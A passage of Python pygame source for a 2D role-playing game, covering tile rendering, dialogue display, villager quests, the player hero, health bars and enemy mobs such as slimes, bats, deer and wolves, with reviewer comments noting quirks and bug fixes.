[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, WWALLTOPLEFT, WWALLTOP, WWALLTOP, WWALLTOP, BBOOKWALL, MMOUNTEDWALL, WWALLTOPRIGHT, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, WWALLRIGHT, FFLOORWALL, FFLOORWALL, FFLOORWALL, FFLOORWALL, FFLOORWALL, WWALLLEFT, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, CCHAIRTWO, WWALLLEFT, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, WWALLRIGHT, FFLOORBASIC, CCHAIRONE, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, WWALLLEFT, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, WWALLLEFT, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, WWALLRIGHT, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, FFLOORBASIC, WWALLLEFT, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, WWALLBOTTOMLEFT, WWALLBOTTOM, WWALLBOTTOM, EEXIT, WWALLBOTTOM, WWALLBOTTOM, WWALLBOTTOMRIGHT, IINDOORDARK],
[IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK, IINDOORDARK]
]
#Functions
def quitgame():
    """Shut pygame down cleanly and terminate the process."""
    pg.quit()
    quit()
def message_display(text, fontsize, timer, colour):
    """Draw `text` on the dialogue scroll at the bottom of the screen.

    `timer` is a frame budget, not seconds: the loop repeats roughly
    timer / 0.1 times, blitting the scroll and text each pass and updating
    only the dialogue strip of the display.

    NOTE(review): this is a blocking busy-wait — no event pumping and no
    clock tick while it runs, so the game is unresponsive for the whole
    message. Callers pass values from 3.9 up to 760, so durations vary
    wildly; confirm that is intended.
    """
    largeText = pg.font.Font('PressStart2P.ttf', fontsize)
    TextSurf, TextRect = text_objects(text, largeText, colour)
    TextRect.center = ((display_width / 2), 820)
    while timer > 0:
        GAMEDISPLAY.blit(scroll, (0, 740))
        GAMEDISPLAY.blit(TextSurf, TextRect)
        timer -= 0.1
        pg.display.update(pg.Rect(0, 750, 1120, 300))
def text_objects(text, font, colour):
    """Render `text` with `font` in `colour`; return (surface, rect)."""
    rendered = font.render(text, True, colour)
    return rendered, rendered.get_rect()
def intro_images():
    """Draw the intro scene: the first map background, then the son sprite."""
    displayBackground(tilemapone)
    GAMEDISPLAY.blit(son, (970, 640))
def more_images():
    """Overlay the mage and the first story picture onto the intro scene."""
    GAMEDISPLAY.blit(mage, (855, 640))
    GAMEDISPLAY.blit(firstpicture, (928, 640))
def display_image(image, x, y, timer):
    """Blit `image` at (x, y), refresh the whole display, then block
    for `timer` seconds (used for story slides)."""
    GAMEDISPLAY.blit(image, (x, y))
    pg.display.update()
    time.sleep(timer)
def button(msg, x, y, w, h, ic, ac, action = None):
    """Draw a clickable rectangle button with centred label `msg`.

    Args:
        msg: label text.
        x, y, w, h: button rectangle.
        ic: idle colour, ac: hover (active) colour.
        action: optional zero-argument callback fired on left-click
            while hovered (plays the button sound first).
    """
    mouse = pg.mouse.get_pos()
    click = pg.mouse.get_pressed()
    # Hover when the cursor is strictly inside the rectangle.
    hovered = x + w > mouse[0] > x and y + h > mouse[1] > y
    # Single draw call instead of duplicated branches.
    pg.draw.rect(GAMEDISPLAY, ac if hovered else ic, (x, y, w, h))
    # `is not None` instead of `!= None` (identity check is the idiom).
    if hovered and click[0] == 1 and action is not None:
        buttonsound.play()
        action()
    textSurf, textRect = text_objects(msg, smallText, black)
    textRect.center = ((x + (w / 2)), (y + (h / 2)))
    GAMEDISPLAY.blit(textSurf, textRect)
def stair():
    """Play one stair footstep sound (used as a threading.Timer callback)."""
    stairsound.play()
def play_stairsound():
    """Play the stair sound twice: once immediately and again 0.45 s later."""
    for delay in (0, 0.45):
        threading.Timer(delay, stair).start()
def displayBackground(mapnumber):
    """Blit the tile map `mapnumber` (a grid of tile IDs) and rebuild the
    collision sprite groups.

    Clears `walls` and `doors`, draws every tile, creates a Wall for each
    impassable tile, and a Door trigger in front of each house tile.
    """
    walls.empty()
    doors.empty()
    # Every tile image that blocks movement; membership uses ==, which for
    # these tile surfaces is identity — the same comparison the original
    # if-chain performed.
    solid_tiles = (
        HOUSE, TREE, ROCK, ROCKTWO,
        WATER, WATERTWO, WATERTHREE, WATERFOUR, WATERFIVE, WATERSIX,
        WATERSEVEN, WATEREIGHT, WATERNINE, WATERTEN, WATERELEVEN,
        WATERTWELVE, WATERTHIRTEEN,
        CAVEWALL, CAVEWALLTWO, DARKTOP, DARKLEFT, DARKRIGHT,
        CAVEROCK, CAVEROCKTWO, SNOWTREE, SNOWROCK, HOUSETWO,
        WALLTOPLEFT, WALLTOP, MOUNTEDWALL, BOOKWALL, WALLBOTTOM,
        WALLLEFT, WALLRIGHT, WALLBOTTOMRIGHT, WALLBOTTOMLEFT,
        TABLE, BED,
    )
    for row in range(MAPHEIGHT):
        for column in range(MAPWIDTH):
            # Hoist the triple index: the original re-evaluated
            # tiles[mapnumber[row][column]] up to 40 times per tile.
            tile = tiles[mapnumber[row][column]]
            GAMEDISPLAY.blit(tile, [column * tile_size, row * tile_size])
            if tile in solid_tiles:
                Wall((column * 80, row * 80), 80, 80, tile)
            # Houses additionally get a doorway trigger just below centre.
            if tile is HOUSE or tile is HOUSETWO:
                Door((column * 80 + 38, row * 80 + 30), 3, 10)
#Projectile Classes
class Bullet(pg.sprite.Sprite):
    """Magic projectile fired by the player.

    Travels 8 px per update in a fixed direction and despawns after
    1150 ms or on leaving the screen.
    """
    def __init__(self, x, y, direct, levelone):
        self.groups = all_sprites, bullets
        pg.sprite.Sprite.__init__(self, self.groups)
        # The rect is always sized from the basic magic sprite, matching
        # the original behaviour even when the upgraded art is swapped in.
        self.image = magic
        self.rect = self.image.get_rect()
        self.rect.x = x + 15
        self.rect.y = y + 30
        self.direction = direct
        self.spawn_time = pg.time.get_ticks()
        self.image = magic if levelone == True else magictwo

    def update(self):
        steps = {'left': (-8, 0), 'right': (8, 0), 'up': (0, -8), 'down': (0, 8)}
        dx, dy = steps.get(self.direction, (0, 0))
        self.rect.x += dx
        self.rect.y += dy
        expired = pg.time.get_ticks() - self.spawn_time > 1150
        off_screen = (self.rect.y < 0 or self.rect.y > display_height
                      or self.rect.x < 0 or self.rect.x > display_width)
        if expired or off_screen:
            self.kill()
class Fireball(pg.sprite.Sprite):
    """Dragon projectile: flies 8 px per update until it leaves the screen."""
    def __init__(self, x, y, direct):
        self.groups = all_sprites, fireballs
        pg.sprite.Sprite.__init__(self, self.groups)
        self.image = fire
        self.rect = self.image.get_rect()
        self.rect.x = x + 15
        self.rect.y = y + 30
        self.direction = direct
        self.spawn_time = pg.time.get_ticks()

    def update(self):
        steps = {'left': (-8, 0), 'right': (8, 0), 'up': (0, -8), 'down': (0, 8)}
        dx, dy = steps.get(self.direction, (0, 0))
        self.rect.x += dx
        self.rect.y += dy
        # De Morgan of the original boundary test: kill once outside screen.
        if not (0 <= self.rect.x <= display_width and 0 <= self.rect.y <= display_height):
            self.kill()
#Misc Classes
class Wall(pg.sprite.Sprite):
    """Impassable obstacle; collision rect of size (w, h) at `wallpos`.

    All call sites pass 80x80 (one map tile).
    """
    def __init__(self, wallpos, w, h, image):
        self.groups = all_sprites, walls
        pg.sprite.Sprite.__init__(self, self.groups)
        self.image = image
        self.rect = self.image.get_rect()
        self.rect.topleft = wallpos
        self.rect.width = w
        # Bug fix: the original assigned `self.rect.width = h` twice,
        # never setting the height.
        self.rect.height = h
class SceneBase:
    """Minimal scene node for the game's scene-switching loop.

    A scene points at the scene to run next; it points at itself while it
    stays active, and at None once terminated.
    """
    def __init__(self):
        # Active scene: keep running this one.
        self.next = self

    def Render(self, screen):
        """Draw the scene; subclasses override."""
        pass

    def SwitchToScene(self, next_scene):
        """Hand control to `next_scene` and clear in-flight projectiles."""
        bullets.empty()
        self.next = next_scene

    def Terminate(self):
        """End the scene stack (next scene becomes None)."""
        self.SwitchToScene(None)
class HappySprite(pg.sprite.Sprite):
    """Shared sprite-sheet animation helpers for animated sprites.

    Subclasses must set `self.sheet` (the sprite sheet surface) and
    `self.frame` (current frame index) before calling these.
    """
    def __init__(self):
        # Subclasses perform their own pg.sprite.Sprite.__init__.
        pass

    def get_frame(self, frame_set):
        """Advance to the next frame, wrapping to 0, and return its clip rect."""
        self.frame = (self.frame + 1) % len(frame_set)
        return frame_set[self.frame]

    def clip(self, clipped_rect):
        """Set the sheet's clip region.

        A dict is treated as an animation frame set (advances the frame);
        anything else is used directly as a single clip rectangle.
        """
        if isinstance(clipped_rect, dict):
            self.sheet.set_clip(pg.Rect(self.get_frame(clipped_rect)))
        else:
            self.sheet.set_clip(pg.Rect(clipped_rect))
        return clipped_rect
class Coin(HappySprite):
    """Spinning coin pickup dropped by slain mobs; worth `value` coins."""
    def __init__(self, position, value):
        self.groups = all_sprites, coins
        pg.sprite.Sprite.__init__(self, self.groups)
        self.value = value
        self.sheet = coin_sheet
        self.sheet.set_clip(pg.Rect(14, 0, 36, 64))
        self.image = self.sheet.subsurface(self.sheet.get_clip())
        self.rect = self.image.get_rect()
        self.rect.topleft = position
        self.frame = 0
        # Eight spin frames laid out horizontally, 64 px apart.
        self.all_states = {n: (14 + 64 * n, 0, 36, 64) for n in range(8)}
        self.pick_sound = 0  # guards against playing the pickup sound twice

    def update(self, player_rect):
        self.clip(self.all_states)
        self.image = self.sheet.subsurface(self.sheet.get_clip())
        if not self.rect.colliderect(player_rect):
            return
        if self.pick_sound < 1:
            coin_sound.play()
            self.pick_sound += 1
        self.kill()
class Cloud(pg.sprite.Sprite):
    """Decorative cloud drifting right; despawns once fully off-screen."""
    def __init__(self, position, img):
        self.groups = all_sprites, clouds
        pg.sprite.Sprite.__init__(self, self.groups)
        self.image = img
        self.rect = self.image.get_rect(topleft=position)

    def update(self):
        self.rect.x += 10
        if self.rect.left > display_width:
            self.kill()
class Door(pg.sprite.Sprite):
    """Invisible w-by-h trigger zone placed over a house doorway."""
    def __init__(self, doorpos, w, h):
        self.groups = all_sprites, doors
        pg.sprite.Sprite.__init__(self, self.groups)
        self.rect = pg.Rect(doorpos, (w, h))
class Flower(pg.sprite.Sprite):
    """Collectible desert flower placed at `position`."""
    def __init__(self, position):
        self.groups = all_sprites, desert_flower
        pg.sprite.Sprite.__init__(self, self.groups)
        self.image = flowerimg
        self.rect = self.image.get_rect(topleft=position)
class Shovel(pg.sprite.Sprite):
    """Shop item: a shovel priced at 20 coins."""
    def __init__(self, position):
        self.groups = all_sprites, shovels
        pg.sprite.Sprite.__init__(self, self.groups)
        self.image = shovelimg
        self.rect = self.image.get_rect(topleft=position)
        self.price = 20
class HealthPotion(pg.sprite.Sprite):
    """Shop item: a health potion priced at 6 coins."""
    def __init__(self, position):
        self.groups = all_sprites, health_pots
        pg.sprite.Sprite.__init__(self, self.groups)
        self.image = potion_still
        self.rect = self.image.get_rect(topleft=position)
        self.price = 6
#Walking Villager One
class FriendlySpriteTwo(HappySprite):
    """Walking villager who paces vertically and gives the slime quest.

    Dialogue advances through `convonum`; `quest` flags that the quest was
    offered, `completed` that the wand reward was collected.
    """
    def __init__(self, position):
        self.groups = all_sprites, friendly_two
        pg.sprite.Sprite.__init__(self, self.groups)
        self.sheet = walkingsprite
        self.sheet.set_clip(pg.Rect(57, 0, 40, 52))
        self.image = self.sheet.subsurface(self.sheet.get_clip())
        self.rect = self.image.get_rect()
        self.rect.topleft = position
        self.frame = 0
        # Sprite-sheet clip rectangles per animation frame.
        self.up_states = {0: (6, 157, 36, 53), 1: (58, 157, 38, 53), 2: (112, 157, 36, 53)}
        self.down_states = {0: (4, 0, 43, 52), 1: (57, 0, 40, 52), 2: (108, 0, 41, 52)}
        self.direction = 'down'
        self.convonum = 0       # progress through the conversation lines
        self.quest = False      # slime quest offered
        self.completed = False  # reward handed out
    def update(self, direction, playerrect):
        # Animate and move unless currently touching the player.
        if not self.rect.colliderect(playerrect):
            if direction == 'up':
                self.clip(self.up_states)
                self.rect.y -= 3  # NOTE(review): moves up faster (3 px) than down (1 px) — confirm intended
            if direction == 'down':
                self.clip(self.down_states)
                self.rect.y += 1
        self.image = self.sheet.subsurface(self.sheet.get_clip())
    def handle_event(self, direction, playersrect, events, playerquest, firespeed):
        # NOTE(review): `firespeed` is accepted but never used here — confirm.
        self.update('down', playersrect)
        # Reverse pacing direction when bumping into a wall.
        for wall in walls:
            if self.rect.colliderect(wall.rect):
                if direction == 'up':
                    self.rect.top = wall.rect.bottom
                    self.direction = 'down'
                if direction == 'down':
                    self.rect.bottom = wall.rect.top
                    self.direction = 'up'
        # Dialogue / quest state machine, driven by mouse clicks while the
        # player is in contact. NOTE(review): loops once per sprite in
        # `character`; presumably that group holds a single player.
        for characterone in character:
            if events.type == pg.MOUSEBUTTONDOWN and self.rect.colliderect(playersrect):
                self.msgtimer = 3.9  # NOTE(review): set but message_display below uses literal timers
                if playerquest == 5:
                    message_display('Are you okay? I heard the news...', 18, 700, black)
                elif self.completed == True:
                    message_display('What do you want?', 19, 650, black)
                elif playerquest == 11 and self.quest == True:
                    # Quest done: hand out the upgraded wand reward once.
                    self.completed = True
                    message_display('Thanks! Here is an upgraded wand! Faster fire rate!', 16, 650, black)
                    upgradesound.play()
                else:
                    if self.convonum == 0:
                        message_display('Those stupid slimes!', 19, 550, black)
                        self.convonum += 1
                    elif self.convonum == 1:
                        message_display('Go the the eastern plains and kill them-', 17, 760, black)
                        self.convonum += 1
                    elif self.convonum == 2:
                        self.quest = True
                        message_display('If you succeed I will give you an award!', 17, 650, black)
                        self.convonum += 1
                    elif self.convonum == 3:
                        message_display('What are you doing? Go out and kill the slimes!', 17, 600, black)
            elif self.rect.colliderect(playersrect):
                self.msgtimer = 3.91
                message_display('Click the mouse to talk!', 20, self.msgtimer, black)
#Walking Villager Two
class FriendlySpriteThree(HappySprite):
    """Villager who paces horizontally, reversing when hitting a wall."""
    def __init__(self, position):
        self.groups = all_sprites, friendly_three
        pg.sprite.Sprite.__init__(self, self.groups)
        self.sheet = walkingtwosprite
        self.sheet.set_clip(pg.Rect(52, 49, 38, 47))
        self.image = self.sheet.subsurface(self.sheet.get_clip())
        self.rect = self.image.get_rect()
        self.rect.topleft = position
        self.frame = 0
        # Sprite-sheet clip rectangles per animation frame.
        self.left_states = {0: (4, 51, 39, 45), 1: (52, 49, 38, 47), 2: (100, 49, 39, 47)}
        self.right_states = {0: (4, 99, 39, 45), 1: (54, 97, 37, 47), 2: (100, 99, 39, 45)}
        self.direction = 'left'

    def update(self, direction, playerrect):
        """Animate and move 2 px unless touching the player."""
        if not self.rect.colliderect(playerrect):
            if direction == 'right':
                self.clip(self.right_states)
                self.rect.x += 2
            elif direction == 'left':
                self.clip(self.left_states)
                self.rect.x -= 2
        self.image = self.sheet.subsurface(self.sheet.get_clip())

    def handle_event(self, direction, playersrect, events, playerquest):
        """Reverse on wall contact and show dialogue while the player is near."""
        for wall in walls:
            if not self.rect.colliderect(wall.rect):
                continue
            if direction == 'right':
                self.direction = 'left'
            elif direction == 'left':
                self.direction = 'right'
        for _villager in character:
            touching = self.rect.colliderect(playersrect)
            if events.type == pg.MOUSEBUTTONDOWN and touching:
                self.msgtimer = 3.9
                if playerquest == 5:
                    message_display('You must seek revenge!', 19, 600, black)
                else:
                    message_display('Hey! Good luck on your quest!', 19, 650, black)
            elif touching:
                self.msgtimer = 3.91
                message_display('Click the mouse to talk!', 20, self.msgtimer, black)
#Class for the Player!
class Hero(HappySprite):
    """The player character: movement, wall collision, inventory and combat.

    Movement only activates once `questlvl` exceeds 3 (during the intro the
    hero is locked in place). Collision uses a narrow `collisionrect`
    covering the feet (bottom 17 px) so the hero can overlap obstacles with
    its upper body.
    """
    def __init__(self, position):
        self.groups = all_sprites, character
        pg.sprite.Sprite.__init__(self, self.groups)
        self.sheet = characterssheet
        self.sheet.set_clip(pg.Rect(55, 0, 47, 52))
        self.image = self.sheet.subsurface(self.sheet.get_clip())
        self.rect = self.image.get_rect()
        self.rect.topleft = position
        # Feet-only hitbox: 35 px below the sprite top, 17 px tall.
        self.collisionrect = pg.Rect(self.rect.x, self.rect.y + 35, self.rect.width, 17)
        self.location = None
        self.frame = 0
        # Sprite-sheet clip rectangles per walking frame.
        self.left_states = {0: (1, 52, 45, 53), 1: (54, 52, 44, 53), 2: (106, 52, 45, 53)}
        self.right_states = {0: (7, 105, 44, 52), 1: (59, 105, 44, 52), 2: (112, 105, 44, 52)}
        self.up_states = {0: (8, 157, 43, 53), 1: (61, 157, 42, 53), 2: (113, 157, 43, 53)}
        self.down_states = {0: (3, 0, 44, 52), 1: (55, 0, 47, 52), 2: (108, 0, 46, 52)}
        self.direction = 'down'
        self.last_shot = 0        # timestamp of the last bullet (rate limiting)
        self.questlvl = 0         # story progress; movement unlocks above 3
        self.firespeed = 550      # minimum ms between shots
        self.wand = 0             # 0 = basic wand, otherwise upgraded
        self.health = 900         # NOTE(review): max_health below is 268 — confirm which unit each uses
        self.healthlvl = 0
        self.num_of_coins = 0
        self.num_of_potions = 0
        self.num_of_flowers = 0
        self.num_of_shovels = 0
        self.movespeed = 7.8
        self.bootlvl = 0
        self.max_health = 268     # cap for the health bar's right edge (pixels)
    def get_location(self):
        return self.location
    def lower_health(self, value):
        # Damage is value plus a flat 5.
        playerhitsound.play()
        self.health -= (value + 5)
    def increase_flowers(self):
        # NOTE(review): sets the count to 1 rather than incrementing — confirm intended.
        self.num_of_flowers = 1
    def heal(self, healthbarrect):
        # Consume one potion: grow the health bar up to 50 px, capped at max_health.
        amountofheal = 50
        if self.num_of_potions > 0:
            while amountofheal > 0 and healthbarrect.right <= self.max_health:
                healthbarrect.x += 1
                amountofheal -= 1
            self.num_of_potions -= 1
    def update(self, direction):
        # Movement/animation is a no-op until the intro is over (questlvl > 3).
        if self.questlvl > 3:
            if direction == 'left':
                self.clip(self.left_states)
                self.rect.x -= self.movespeed
                self.collisionrect.x -= self.movespeed
            if direction == 'right':
                self.clip(self.right_states)
                self.rect.x += self.movespeed
                self.collisionrect.x += self.movespeed
            if direction == 'up':
                self.clip(self.up_states)
                self.rect.y -= self.movespeed
                self.collisionrect.y -= self.movespeed
            if direction == 'down':
                self.clip(self.down_states)
                self.rect.y += self.movespeed
                self.collisionrect.y += self.movespeed
            if direction == 'stand_left':
                self.clip(self.left_states[1])
            if direction == 'stand_right':
                self.clip(self.right_states[1])
            # NOTE: 'stand_up' uses down_states and vice versa; this cancels the
            # mirrored swap in handle_event's KEYUP branch below, so the net
            # result is the correct facing frame. Change both or neither.
            if direction == 'stand_up':
                self.clip(self.down_states[1])
            if direction == 'stand_down':
                self.clip(self.up_states[1])
            self.image = self.sheet.subsurface(self.sheet.get_clip())
    def handle_event(self, event, direction):
        # Resolve wall collisions by snapping the feet hitbox to the wall edge,
        # then re-aligning the sprite rect to it.
        for wall in walls:
            if self.collisionrect.colliderect(wall.rect):
                if direction == 'left':
                    self.collisionrect.left = wall.rect.right
                    self.rect.left = self.collisionrect.left
                if direction == 'right':
                    self.collisionrect.right = wall.rect.left
                    self.rect.right = self.collisionrect.right
                if direction == 'up':
                    self.collisionrect.top = wall.rect.bottom
                    self.rect.top = self.collisionrect.top - 35
                if direction == 'down':
                    self.collisionrect.bottom = wall.rect.top
                    self.rect.bottom = wall.rect.top
        if event.type == pg.QUIT:
            quitgame()
        if event.type == pg.KEYDOWN:
            # Footstep sounds only while movement is unlocked.
            if self.questlvl > 3:
                if event.key == pg.K_LEFT or event.key == pg.K_RIGHT:
                    walkingsound.play()
                elif event.key == pg.K_UP or event.key == pg.K_DOWN:
                    walkingtwosound.play()
            if event.key == pg.K_LEFT:
                self.update('left')
                self.direction = 'left'
            if event.key == pg.K_RIGHT:
                self.update('right')
                self.direction = 'right'
            if event.key == pg.K_UP:
                self.update('up')
                self.direction = 'up'
            if event.key == pg.K_DOWN:
                self.update('down')
                self.direction = 'down'
        if event.type == pg.KEYUP:
            walkingsound.stop()
            walkingtwosound.stop()
            if event.key == pg.K_LEFT:
                self.update('stand_left')
            if event.key == pg.K_RIGHT:
                self.update('stand_right')
            # Swapped stand_up/stand_down tokens cancel the swap in update().
            if event.key == pg.K_UP:
                self.update('stand_down')
            if event.key == pg.K_DOWN:
                self.update('stand_up')
        # Pick up any coin the feet hitbox touches (Coin.update handles removal).
        for coin in coins:
            if self.collisionrect.colliderect(coin.rect):
                self.num_of_coins += coin.value
    def shoot(self):
        # Basic wand fires the level-one projectile; upgraded wand the other.
        if self.wand == 0:
            bullet = Bullet(self.rect.x, self.rect.y, self.direction, True)
        else:
            bullet = Bullet(self.rect.x, self.rect.y, self.direction, False)
    def setLocation(self, location):
        self.location = location
#Health Classes
class Healthbar(pg.sprite.Sprite):
    """HUD bar for the player's health; damage slides it left, upgrades right."""
    def __init__(self, playerhealth, position):
        self.groups = all_sprites, health
        pg.sprite.Sprite.__init__(self, self.groups)
        self.health = playerhealth
        self.image = healthstatus
        self.rect = self.image.get_rect(topleft=position)
        self.upgradeonce = False

    def lower(self, value):
        # 5 px per point of damage.
        self.rect.x -= value * 5

    def upgrade(self):
        self.rect.x += 28
class HealthBox(pg.sprite.Sprite):
    """Pickup box granting a health upgrade; `mode` tracks its state."""
    def __init__(self, position, mode):
        self.groups = all_sprites, healthbox
        pg.sprite.Sprite.__init__(self, self.groups)
        self.image = healthboximg
        self.rect = self.image.get_rect()
        self.rect.topleft = position
        self.mode = mode
    def healthupgrade(self):
        # Bug fix: the original assigned a local `mode = 1`, which had no
        # effect — the instance attribute is what callers can observe.
        self.mode = 1
        self.kill()
class DragonHealthbar(pg.sprite.Sprite):
    """HUD bar for the dragon boss's health."""
    def __init__(self, dragon_health, position):
        self.groups = all_sprites, dragonhealth
        pg.sprite.Sprite.__init__(self, self.groups)
        self.health = dragon_health
        self.image = dragonstatus
        self.rect = self.image.get_rect(topleft=position)

    def lower(self, value):
        # Slides right on damage — opposite direction to the player's bar.
        self.rect.x += value * 5
#Super class for all Enemy Mobs
class EnemyMob(HappySprite):
    """Base class for hostile mobs: wall collision, player chasing, and
    bullet-hit handling.

    Subclasses must set: sheet, frame, rect, *_states, direction, movespeed,
    health, sound, deathsound (counter), and value (coin drop).
    """
    def __init__(self):
        # Subclasses perform their own sprite-group initialisation.
        pass
    def handle_event(self, event, direction, playerrect):
        # Snap back out of any wall overlapped this frame.
        for wall in walls:
            if self.rect.colliderect(wall.rect):
                if direction == 'left':
                    self.rect.left = wall.rect.right
                if direction == 'right':
                    self.rect.right = wall.rect.left
                if direction == 'up':
                    self.rect.top = wall.rect.bottom
                if direction == 'down':
                    self.rect.bottom = wall.rect.top
        # Chase the player one axis at a time; the `not` guards stop the mob
        # once its edge has passed the player's, preventing oscillation.
        # elif order gives vertical-up priority, then right, down, left.
        if self.health > 0:
            if self.rect.centery > playerrect.centery and not self.rect.top < playerrect.bottom:
                self.update('up')
                self.direction = 'up'
            elif self.rect.centerx < playerrect.centerx and not self.rect.right > playerrect.left:
                self.update('right')
                self.direction = 'right'
            elif self.rect.centery < playerrect.centery and not self.rect.bottom > playerrect.top:
                self.update('down')
                self.direction = 'down'
            elif self.rect.centerx >= playerrect.centerx and not self.rect.left < playerrect.right:
                self.update('left')
                self.direction = 'left'
        # Each overlapping-bullet frame costs 0.1 health; bullets are NOT
        # destroyed here, so one bullet drains health every frame it overlaps.
        if pg.sprite.spritecollideany(self, bullets, collided = None) != None:
            self.health -= 0.1
            if self.health > 0:
                hitsound.play()
                GAMEDISPLAY.blit(mobhit, (self.rect.centerx, self.rect.centery))
            else:
                # Death: play the sound at most twice, drop a coin, despawn.
                if self.deathsound < 2:
                    deathsound.play()
                    self.deathsound += 1
                new_coin = Coin((self.rect.x, self.rect.y), self.value)
                self.kill()
    def update(self, direction):
        # Advance the matching animation frame set and step by movespeed.
        if direction == 'left':
            self.clip(self.left_states)
            self.rect.x -= self.movespeed
        if direction == 'right':
            self.clip(self.right_states)
            self.rect.x += self.movespeed
        if direction == 'up':
            self.clip(self.up_states)
            self.rect.y -= self.movespeed
        if direction == 'down':
            self.clip(self.down_states)
            self.rect.y += self.movespeed
        self.image = self.sheet.subsurface(self.sheet.get_clip())
#Inheritance of Enemy Mobs
class Bat(EnemyMob):
    """Cave bat: fast, fragile mob worth 2 coins."""
    def __init__(self, position, facing):
        self.group = bats
        self.groups = all_sprites, bats
        pg.sprite.Sprite.__init__(self, self.groups)
        self.sheet = mobsprite
        self.sheet.set_clip(pg.Rect(126, 11, 58, 30))
        self.frame = 0
        self.image = self.sheet.subsurface(self.sheet.get_clip())
        self.rect = self.image.get_rect()
        self.rect.topleft = position
        # Sprite-sheet clip rectangles per animation frame.
        self.left_states = {0: (70, 193, 34, 42), 1: (134, 203, 34, 30), 2: (198, 203, 30, 42)}
        self.right_states = {0: (76, 65, 34, 42), 1: (140, 75, 34, 30), 2: (208, 75, 30, 42)}
        self.up_states = {0: (64, 137, 54, 44), 1: (126, 139, 58, 26), 2: (188, 129, 62, 40)}
        self.down_states = {0: (64, 9, 54, 44), 1: (126, 11, 58, 30), 2: (188, 1, 62, 42)}
        # NOTE(review): the original assigned `facing` and then immediately
        # overwrote it with 'down', so the argument has no lasting effect.
        self.direction = 'down'
        self.movespeed = 1.85
        self.health = 0.5
        self.sound = batsound
        self.deathsound = 0
        self.value = 2
class Slime(EnemyMob):
    """Slime: weakest mob, worth 1 coin (target of the villager's quest)."""
    def __init__(self, position, facing):
        self.group = slimes
        self.groups = all_sprites, slimes
        pg.sprite.Sprite.__init__(self, self.groups)
        self.sheet = slime
        self.sheet.set_clip(pg.Rect(173, 33, 28, 26))
        self.frame = 0
        self.image = self.sheet.subsurface(self.sheet.get_clip())
        self.rect = self.image.get_rect()
        self.rect.topleft = position
        # Sprite-sheet clip rectangles per animation frame.
        self.left_states = {0: (47, 97, 26, 27), 1: (111, 97, 24, 28), 2: (175, 95, 24, 30)}
        self.right_states = {0: (47, 161, 24, 28), 1: (111, 159, 24, 30), 2: (237, 161, 26, 27)}
        self.up_states = {0: (45, 225, 28, 28), 1: (109, 223, 28, 30), 2: (237, 225, 30, 28)}
        self.down_states = {0: (45, 33, 28, 28), 1: (109, 31, 28, 30), 2: (235, 33, 30, 28)}
        # NOTE(review): the original assigned `facing` and then immediately
        # overwrote it with 'down', so the argument has no lasting effect.
        self.direction = 'down'
        self.movespeed = 1.65
        self.health = 0.15
        self.sound = slimesound
        self.deathsound = 0
        self.value = 1
class Deer(EnemyMob):
    """Deer: mid-tier mob worth 3 coins."""
    def __init__(self, position, facing):
        self.group = deers
        self.groups = all_sprites, deers
        pg.sprite.Sprite.__init__(self, self.groups)
        self.sheet = deer
        self.sheet.set_clip(pg.Rect(78, 0, 36, 64))
        self.frame = 0
        self.image = self.sheet.subsurface(self.sheet.get_clip())
        self.rect = self.image.get_rect()
        self.rect.topleft = position
        # Sprite-sheet clip rectangles per animation frame.
        self.left_states = {0: (0, 66, 62, 62), 1: (66, 68, 62, 60), 2: (128, 70, 64, 58)}
        self.right_states = {0: (2, 130, 62, 62), 1: (66, 132, 62, 60), 2: (130, 134, 62, 58)}
        self.up_states = {0: (18, 196, 30, 62), 1: (82, 194, 30, 62), 2: (146, 196, 30, 60)}
        self.down_states = {0: (14, 2, 36, 62), 1: (78, 0, 36, 64), 2: (142, 4, 36, 60)}
        # NOTE(review): the original assigned `facing` and then immediately
        # overwrote it with 'down', so the argument has no lasting effect.
        self.direction = 'down'
        self.movespeed = 1.75
        self.health = 0.95
        self.sound = deersound
        self.deathsound = 0
        self.value = 3
class Wolf(EnemyMob):
    """Wolf: tough, slow mob worth 4 coins."""
    def __init__(self, position, facing):
        self.group = wolves
        self.groups = all_sprites, wolves
        pg.sprite.Sprite.__init__(self, self.groups)
        self.sheet = wolf
        self.sheet.set_clip(pg.Rect(26, 8, 46, 86))
        self.frame = 0
        self.image = self.sheet.subsurface(self.sheet.get_clip())
        self.rect = self.image.get_rect()
        self.rect.topleft = position
        # Sprite-sheet clip rectangles per animation frame.
